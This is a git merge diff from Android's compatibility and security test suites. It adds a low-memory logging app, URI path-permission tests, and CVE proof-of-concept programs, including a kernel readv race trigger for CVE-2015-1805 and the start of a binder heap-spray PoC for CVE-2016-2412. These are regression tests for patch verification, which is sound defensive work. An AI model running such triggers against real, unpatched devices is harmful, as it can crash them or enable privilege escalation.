Merge changes from topic "ndk-aidl-parcelable-array" am: d38a30a6f9
am: 638282c8c8
Change-Id: Icc0cd55325130cfb669beae446fa59462e9a49b5
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/Android.mk b/apps/OomCatcher/Android.mk
similarity index 74%
rename from tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/Android.mk
rename to apps/OomCatcher/Android.mk
index 70a096e..7f47e03 100644
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/Android.mk
+++ b/apps/OomCatcher/Android.mk
@@ -1,3 +1,4 @@
+#
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
@@ -12,18 +13,21 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
-LOCAL_PATH:= $(call my-dir)
+LOCAL_PATH:= $(call my-dir)
include $(CLEAR_VARS)
-LOCAL_MODULE_TAGS := tests
-LOCAL_SDK_VERSION := current
+LOCAL_MODULE_TAGS := optional
LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests cts_instant
-LOCAL_CERTIFICATE := cts/hostsidetests/appsecurity/certs/cts-testkey2
-LOCAL_PACKAGE_NAME := CtsAdversarialPermissionUserApp
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
+
+LOCAL_PACKAGE_NAME := OomCatcher
+
+LOCAL_SDK_VERSION := current
+
+LOCAL_COMPATIBILITY_SUITE := cts sts
include $(BUILD_CTS_PACKAGE)
+
diff --git a/apps/OomCatcher/AndroidManifest.xml b/apps/OomCatcher/AndroidManifest.xml
new file mode 100644
index 0000000..25513e2
--- /dev/null
+++ b/apps/OomCatcher/AndroidManifest.xml
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!-- Copyright (C) 2018 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="com.android.cts.oomcatcher"
+ android:versionCode="1"
+ android:versionName="1.0">
+
+ <application>
+ <activity android:name=".OomCatcher">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+ </application>
+</manifest>
diff --git a/apps/OomCatcher/src/com/android/cts/oomcatcher/OomCatcher.java b/apps/OomCatcher/src/com/android/cts/oomcatcher/OomCatcher.java
new file mode 100644
index 0000000..32590b4
--- /dev/null
+++ b/apps/OomCatcher/src/com/android/cts/oomcatcher/OomCatcher.java
@@ -0,0 +1,113 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.android.cts.oomcatcher;
+
+import android.app.Activity;
+import android.os.Bundle;
+import android.app.ActivityManager;
+import android.content.Context;
+import android.content.ComponentCallbacks2;
+import android.util.Log;
+import java.util.concurrent.atomic.AtomicBoolean;
+
+/*
+ * An App to report to logcat the lowmemory status. As soon as the app detects low memory, it
+ * immediately reports. In addition, it also reports every second.
+ */
+public class OomCatcher extends Activity implements ComponentCallbacks2 {
+
+ private static final String LOG_TAG = "OomCatcher";
+
+ private AtomicBoolean isOom = new AtomicBoolean(false);
+
+ Thread logThread;
+
+ public void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ logThread = new Thread() {
+ @Override
+ public void run() {
+ while (true) {
+ logStatus();
+ try {
+ Thread.sleep(1000); // 1 second
+ } catch (InterruptedException e) {
+ // thread has been killed
+ }
+ }
+ }
+ };
+ logThread.setDaemon(true);
+ logThread.start();
+ }
+
+ public void onDestroy() {
+ if (logThread != null) {
+ logThread.interrupt();
+ }
+ }
+
+ /*
+ * Receive memory callbacks from the Android system. All report low memory except for
+ * TRIM_MEMORY_UI_HIDDEN, which reports when the app is in the background. We don't care about
+ * that, only when the device is at risk of OOMing.
+ *
+ * For all indications of low memory, onLowMemory() is called.
+ */
+ @Override
+ public void onTrimMemory(int level) {
+ Log.i(LOG_TAG, "Memory trim level: " + level);
+ switch (level) {
+ // background messages
+ case TRIM_MEMORY_MODERATE:
+ case TRIM_MEMORY_COMPLETE:
+ // foreground messages
+ case TRIM_MEMORY_RUNNING_LOW:
+ case TRIM_MEMORY_RUNNING_CRITICAL:
+ // fallthrough
+ onLowMemory();
+ break;
+ case TRIM_MEMORY_UI_HIDDEN:
+ Log.i(LOG_TAG, "UI is hidden because the app is in the background.");
+ break;
+ // lower priority messages being ignored
+ case TRIM_MEMORY_BACKGROUND:
+ case TRIM_MEMORY_RUNNING_MODERATE:
+ // fallthrough
+ Log.i(LOG_TAG, "ignoring low priority oom messages.");
+ break;
+ default:
+ Log.i(LOG_TAG, "unknown memory trim message.");
+ return;
+ }
+ }
+
+ /*
+ * An earlier API implementation of low memory callbacks. Sets oom status and logs.
+ */
+ @Override
+ public void onLowMemory() {
+ isOom.set(true);
+ logStatus();
+ }
+
+ /*
+ * Log to logcat the current lowmemory status of the app.
+ */
+ private void logStatus() {
+ Log.i(LOG_TAG, isOom.get() ? "Low memory" : "Normal memory");
+ }
+}
diff --git a/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/src/com/android/cts/usespermissiondiffcertapp/AccessPermissionWithDiffSigTest.java b/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/src/com/android/cts/usespermissiondiffcertapp/AccessPermissionWithDiffSigTest.java
index f187504..355de8c 100644
--- a/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/src/com/android/cts/usespermissiondiffcertapp/AccessPermissionWithDiffSigTest.java
+++ b/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/src/com/android/cts/usespermissiondiffcertapp/AccessPermissionWithDiffSigTest.java
@@ -141,6 +141,16 @@
}
}
+ private void assertContentUriAllowed(Uri uri) {
+ assertReadingContentUriAllowed(uri);
+ assertWritingContentUriAllowed(uri);
+ }
+
+ private void assertContentUriNotAllowed(Uri uri, String msg) {
+ assertReadingContentUriNotAllowed(uri, msg);
+ assertWritingContentUriNotAllowed(uri, msg);
+ }
+
private void assertWritingContentUriNotAllowed(Uri uri, String msg) {
final ContentResolver resolver = getContext().getContentResolver();
try {
@@ -1170,6 +1180,26 @@
}
/**
+ * Test that shady {@link Uri} are blocked by {@code path-permission}.
+ */
+ public void testRestrictingProviderMatchingShadyPaths() {
+ assertContentUriAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting/"));
+ assertContentUriAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting//"));
+ assertContentUriAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting///"));
+ assertContentUriNotAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting/foo"), null);
+ assertContentUriNotAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting//foo"), null);
+ assertContentUriNotAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting///foo"), null);
+ assertContentUriNotAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting/foo//baz"), null);
+ }
+
+ /**
* Verify that at least one {@code path-permission} rule will grant access,
* even if the caller doesn't hold another matching {@code path-permission}.
*/
diff --git a/hostsidetests/security/Android.mk b/hostsidetests/security/Android.mk
index cdf71dc..8bef613 100644
--- a/hostsidetests/security/Android.mk
+++ b/hostsidetests/security/Android.mk
@@ -21,7 +21,7 @@
LOCAL_MODULE_TAGS := optional
# tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests sts
+LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
# Must match the package name in CtsTestCaseList.mk
LOCAL_MODULE := CtsSecurityHostTestCases
diff --git a/hostsidetests/securitybulletin/Android.mk b/hostsidetests/securitybulletin/Android.mk
index a07fbbd..fc814a5 100644
--- a/hostsidetests/securitybulletin/Android.mk
+++ b/hostsidetests/securitybulletin/Android.mk
@@ -23,7 +23,7 @@
LOCAL_MODULE_TAGS := optional
# tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_COMPATIBILITY_SUITE := cts vts general-tests sts
# Must match the package name in CtsTestCaseList.mk
LOCAL_MODULE := CtsSecurityBulletinHostTestCases
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index a46880c..1985a4d 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -27,7 +27,6 @@
<option name="push" value="CVE-2016-6734->/data/local/tmp/CVE-2016-6734" />
<option name="push" value="CVE-2016-6735->/data/local/tmp/CVE-2016-6735" />
<option name="push" value="CVE-2016-6736->/data/local/tmp/CVE-2016-6736" />
- <option name="push" value="CVE-2016-8424->/data/local/tmp/CVE-2016-8424" />
<option name="push" value="CVE-2016-8425->/data/local/tmp/CVE-2016-8425" />
<option name="push" value="CVE-2016-8426->/data/local/tmp/CVE-2016-8426" />
<option name="push" value="CVE-2016-8427->/data/local/tmp/CVE-2016-8427" />
@@ -37,10 +36,10 @@
<option name="push" value="CVE-2016-8431->/data/local/tmp/CVE-2016-8431" />
<option name="push" value="CVE-2016-8432->/data/local/tmp/CVE-2016-8432" />
<option name="push" value="CVE-2016-8434->/data/local/tmp/CVE-2016-8434" />
- <option name="push" value="CVE-2016-2504->/data/local/tmp/CVE-2016-2504" />
<!-- Bulletin 2016-04 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2016-2412->/data/local/tmp/CVE-2016-2412" />
<option name="push" value="CVE-2016-0844->/data/local/tmp/CVE-2016-0844" />
<option name="push" value="CVE-2016-2419->/data/local/tmp/CVE-2016-2419" />
@@ -48,21 +47,19 @@
<!-- Bulletin 2016-05 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="CVE-2016-2460->/data/local/tmp/CVE-2016-2460" />
+ <option name="push" value="CVE-2015-1805->/data/local/tmp/CVE-2015-1805" />
<!--__________________-->
<!-- Bulletin 2016-06 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
- <option name="push" value="CVE-2016-2062->/data/local/tmp/CVE-2016-2062" />
<!--__________________-->
<!-- Bulletin 2016-07 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
- <option name="push" value="CVE-2016-3809->/data/local/tmp/CVE-2016-3809" />
<option name="push" value="CVE-2016-3818->/data/local/tmp/CVE-2016-3818" />
<!-- Bulletin 2016-09 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
- <option name="push" value="CVE-2015-8839->/data/local/tmp/CVE-2015-8839" />
<option name="push" value="CVE-2016-2471->/data/local/tmp/CVE-2016-2471" />
<!--__________________-->
@@ -85,11 +82,13 @@
<!--__________________-->
<!-- Bulletin 2017-02 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-0415->/data/local/tmp/CVE-2017-0415" />
<option name="push" value="CVE-2017-0426->/data/local/tmp/CVE-2017-0426" />
<!--__________________-->
<!-- Bulletin 2017-03 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-0477->/data/local/tmp/CVE-2017-0477" />
<option name="push" value="CVE-2017-0479->/data/local/tmp/CVE-2017-0479" />
<option name="push" value="CVE-2017-0334->/data/local/tmp/CVE-2017-0334" />
<option name="push" value="CVE-2016-8479->/data/local/tmp/CVE-2016-8479" />
@@ -145,6 +144,7 @@
<!--__________________-->
<!-- Bulletin 2018-02 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-13273->/data/local/tmp/CVE-2017-13273" />
<option name="push" value="CVE-2017-13232->/data/local/tmp/CVE-2017-13232" />
<!--__________________-->
@@ -157,8 +157,41 @@
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="CVE-2018-9424->/data/local/tmp/CVE-2018-9424" />
+ <!--__________________-->
+ <!-- Bulletin 2018-10 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2018-9490->/data/local/tmp/CVE-2018-9490" />
+ <option name="push" value="CVE-2018-9515->/data/local/tmp/CVE-2018-9515" />
+
<option name="append-bitness" value="true" />
</target_preparer>
+ <!-- Support for 64-bit software codecs has been deprecated from o-mr1-sts-release -->
+ <!-- onwards. Hence tests which use them will be built only for 32-bit architectures. -->
+ <!-- The default 'target_preparer' tries to copy both 64-bit and 32-bit binaries as -->
+ <!-- 'append=bitness' value is set to 'true'. In order to ensure that that only -->
+ <!-- 32-bit binaries are copied, a new 'target_preparer' section is added with -->
+ <!-- 'append-bitness' value set to false and additionally '32' has been added in the -->
+ <!-- end after the bug id. This ensures that it does not try to copy the unavailable -->
+ <!-- 64-bit binary. -->
+ <target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
+ <option name="cleanup" value="true" />
+
+ <option name="push" value="testhevcdec32->/data/local/tmp/testhevcdec" />
+ <option name="push" value="testavcdec32->/data/local/tmp/testavcdec" />
+ <option name="push" value="testmpeg2dec32->/data/local/tmp/testmpeg2dec" />
+
+ <option name="append-bitness" value="false" />
+ </target_preparer>
+
+ <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
+ <option name="cleanup-apks" value="true" />
+ <option name="test-file-name" value="CtsHostLaunchAnyWhereApp.apk" />
+ </target_preparer>
+
+ <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
+ <option name="cleanup-apks" value="true" />
+ <option name="test-file-name" value="OomCatcher.apk" />
+ </target_preparer>
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
<option name="jar" value="CtsSecurityBulletinHostTestCases.jar" />
diff --git a/hostsidetests/securitybulletin/res/CVE-2017-0477.gif b/hostsidetests/securitybulletin/res/CVE-2017-0477.gif
new file mode 100644
index 0000000..67bd51f
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/CVE-2017-0477.gif
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/CVE-2017-0647.zip b/hostsidetests/securitybulletin/res/CVE-2017-0647.zip
new file mode 100644
index 0000000..e01eaf4
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/CVE-2017-0647.zip
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2016_3916.apk b/hostsidetests/securitybulletin/res/cve_2016_3916.apk
deleted file mode 100644
index 96c6128..0000000
--- a/hostsidetests/securitybulletin/res/cve_2016_3916.apk
+++ /dev/null
Binary files differ
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/Android.mk
old mode 100755
new mode 100644
similarity index 87%
rename from hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
rename to hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/Android.mk
index 5e53ee5..6dd41bd
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/Android.mk
@@ -15,19 +15,16 @@
LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-2062
+LOCAL_MODULE := CVE-2015-1805
LOCAL_SRC_FILES := poc.c
LOCAL_MULTILIB := both
LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-LOCAL_SHARED_LIBRARIES := liblog
-
-# Tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts sts vts
LOCAL_CTS_TEST_PACKAGE := android.security.cts
LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS += -Wall -Werror
-
+LOCAL_CFLAGS := -Wall -Werror
+LOCAL_LDFLAGS += -fPIE -pie
include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/poc.c
new file mode 100644
index 0000000..c80b5ed
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/poc.c
@@ -0,0 +1,112 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <fcntl.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/uio.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#include "../includes/common.h"
+
+#define BUFS 256
+#define IOV_LEN 16
+#define MAGIC 7
+
+int fd[2];
+struct iovec *iovs = NULL;
+
+void *func_evil(void *data) {
+ munmap((void *)(0x45678000), PAGE_SIZE);
+ mmap((void *)(0x45678000), PAGE_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
+ return data;
+}
+
+void *func_readv(void *data) {
+ readv(fd[0], iovs, BUFS);
+ return data;
+}
+
+int main() {
+ int ret = -1, i;
+ void *bufs[BUFS];
+ time_t test_started = start_timer();
+ pthread_t thr_evil, thr_readv;
+
+ if (pipe(fd) < 0) {
+ goto __out;
+ }
+ fcntl(fd[0], F_SETFL, O_NONBLOCK);
+ fcntl(fd[1], F_SETFL, O_NONBLOCK);
+
+ iovs = (struct iovec *)malloc(sizeof(bufs) / sizeof(bufs[0]) *
+ sizeof(struct iovec));
+ if (iovs == NULL) {
+ goto __close_pipe;
+ }
+
+ bufs[MAGIC] = mmap((void *)(0x45678000), PAGE_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
+ if (bufs[MAGIC] == MAP_FAILED) {
+ goto __close_pipe;
+ }
+
+ for (size_t i = 0; i < sizeof(bufs) / sizeof(bufs[0]); i++) {
+ if (i == MAGIC) continue;
+ bufs[i] = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE,
+ MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ if (bufs[i] == MAP_FAILED) {
+ goto __free_bufs;
+ }
+
+ iovs[i].iov_base = bufs[i];
+ iovs[i].iov_len = IOV_LEN;
+ }
+
+ iovs[MAGIC - 1].iov_len = IOV_LEN * 10;
+ iovs[MAGIC].iov_base = bufs[MAGIC];
+ iovs[MAGIC].iov_len = IOV_LEN;
+
+ i = 0;
+
+ while (timer_active(test_started)) {
+ write(fd[1], bufs[0], PAGE_SIZE);
+
+ pthread_create(&thr_evil, NULL, func_evil, NULL);
+ pthread_create(&thr_readv, NULL, func_readv, NULL);
+
+ pthread_join(thr_evil, NULL);
+ pthread_join(thr_readv, NULL);
+ }
+
+__free_bufs:
+ for (size_t i = 0; i < sizeof(bufs) / sizeof(bufs[0]); i++) {
+ if (bufs[i]) munmap(bufs[i], PAGE_SIZE);
+ }
+
+__close_pipe:
+ close(fd[0]);
+ close(fd[1]);
+
+__out:
+ return ret;
+
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/poc.c
deleted file mode 100755
index c6a330f..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/poc.c
+++ /dev/null
@@ -1,59 +0,0 @@
-/**
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#define _GNU_SOURCE
-#include <cutils/log.h>
-#include <errno.h>
-#include <fcntl.h>
-#include <linux/falloc.h>
-#include <linux/magic.h>
-#include <stdint.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/types.h>
-#include <sys/utsname.h>
-#include <sys/vfs.h>
-#include <unistd.h>
-
-int main(void) {
- int fd = -1, result = -1;
- char tmpFile[32];
- struct statfs sfs;
-
- memset(tmpFile, 0, sizeof(tmpFile));
- strncpy(tmpFile, "/data/local/tmp/tmpFile", 24);
-
- fd = open(tmpFile, O_WRONLY | O_APPEND | O_CREAT, 0644);
- if (fd < 0) {
- ALOGE("Creation of tmp file is failed [%s]", strerror(errno));
- return -1;
- }
-
- fstatfs(fd, &sfs);
- if (sfs.f_type == EXT4_SUPER_MAGIC) {
- result = fallocate(fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE, 0, 1);
- if (result < 0 && errno == EOPNOTSUPP) {
- ALOGD("fallocate result [%s] errno [%d]", strerror(errno), errno);
- ALOGE("fallocate result EOPNOTSUPP");
- }
- }
-
- if (fd) {
- close(fd);
- }
-
- return 0;
-}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/poc.c
deleted file mode 100644
index d8bdbdb..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/poc.c
+++ /dev/null
@@ -1,107 +0,0 @@
-/**
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-#define _GNU_SOURCE
-
-#define LOG_TAG "CVE-2016-2062"
-
-#include <errno.h>
-#include <fcntl.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/ioctl.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-#include <unistd.h>
-#include <cutils/log.h>
-
-struct kgsl_perfcounter_query {
- unsigned int groupid;
- /* Array to return the current countable for up to size counters */
- unsigned int *countables;
- unsigned int count;
- unsigned int max_counters;
- /* private: reserved for future use */
- unsigned int __pad[2]; /* For future binary compatibility */
-};
-
-/* ioctls
- * Refer msm_kgsl.h
- */
-#define KGSL_IOC_TYPE 0x09
-#define IOCTL_KGSL_PERFCOUNTER_QUERY \
- _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query)
-
-int main() {
- int fd, ret;
- struct kgsl_perfcounter_query perf_query;
-
- fd = open("/dev/kgsl-3d0", O_RDWR);
- if (fd < 0) {
- ALOGE("Unable to open /dev/kgsl-3d0 - Errno %d (%s)\n", errno,
- strerror(errno));
- exit(EXIT_FAILURE);
- }
-
- memset(&perf_query, 0, sizeof(struct kgsl_perfcounter_query));
-
- /* setup sane params to pass a few checks
- * set count=0 and countables=NULL to get max_counters
- * value to allocate memory for countables
- */
- perf_query.groupid = 1;
- perf_query.count = 0;
- perf_query.countables = NULL;
-
- ret = ioctl(fd, IOCTL_KGSL_PERFCOUNTER_QUERY, &perf_query);
- if (ret < 0) {
- ALOGE("Error ioctl failed %d (%s)\n", errno,
- strerror(errno));
- } else {
- // Make sure the max_counters within the limit [1:1000]
- if(perf_query.max_counters > 0 &&
- perf_query.max_counters < 1000) {
- perf_query.countables = (unsigned int*) malloc(
- perf_query.max_counters * sizeof(unsigned int));
- if(perf_query.countables == NULL) {
- ALOGE("malloc failed\n");
- } else {
- /* bad data creates out of memory issue
- * Errno 12 (out of memory)
- */
- perf_query.count = 0x80000001;
-
- ret = ioctl(fd, IOCTL_KGSL_PERFCOUNTER_QUERY, &perf_query);
- if (ret < 0 && errno == 12) { //ENOMEM(12) error
- ALOGE("CVE-2016-2062 failed\n");
- } else {
- ALOGE("CVE-2016-2062 passed\n");
- }
- }
- }
- }
-
- if(NULL != perf_query.countables) {
- free(perf_query.countables);
- perf_query.countables = NULL;
- }
-
- if (fd > -1)
- close(fd);
-
- return EXIT_SUCCESS;
-}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/Android.mk
old mode 100755
new mode 100644
similarity index 79%
copy from hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
copy to hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/Android.mk
index 5e53ee5..77de47e
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/Android.mk
@@ -1,33 +1,35 @@
-# Copyright (C) 2018 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-2062
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-LOCAL_SHARED_LIBRARIES := liblog
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts sts vts
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS += -Wall -Werror
-
-include $(BUILD_CTS_EXECUTABLE)
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-2412
+LOCAL_SRC_FILES := poc.cpp
+
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_SHARED_LIBRARIES := libbinder \
+ libutils
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/poc.cpp
new file mode 100644
index 0000000..7e3b067
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/poc.cpp
@@ -0,0 +1,99 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+
+using namespace android;
+typedef enum TRANTYPE { HEAPSPRAY, HEAPCORRUPT, HEAPFENGSHUI } TRANTYPE;
+
+static void writeParcelableHead(Parcel *pData, const char *class_name) {
+ // write key
+ static int count = 1;
+ const int VAL_PARCELABLE = 4;
+ char buffer[16] = {0};
+ snprintf(buffer, 16, "%d", count);
+
+ pData->writeString16(String16((const char *)buffer));
+ pData->writeInt32(VAL_PARCELABLE);
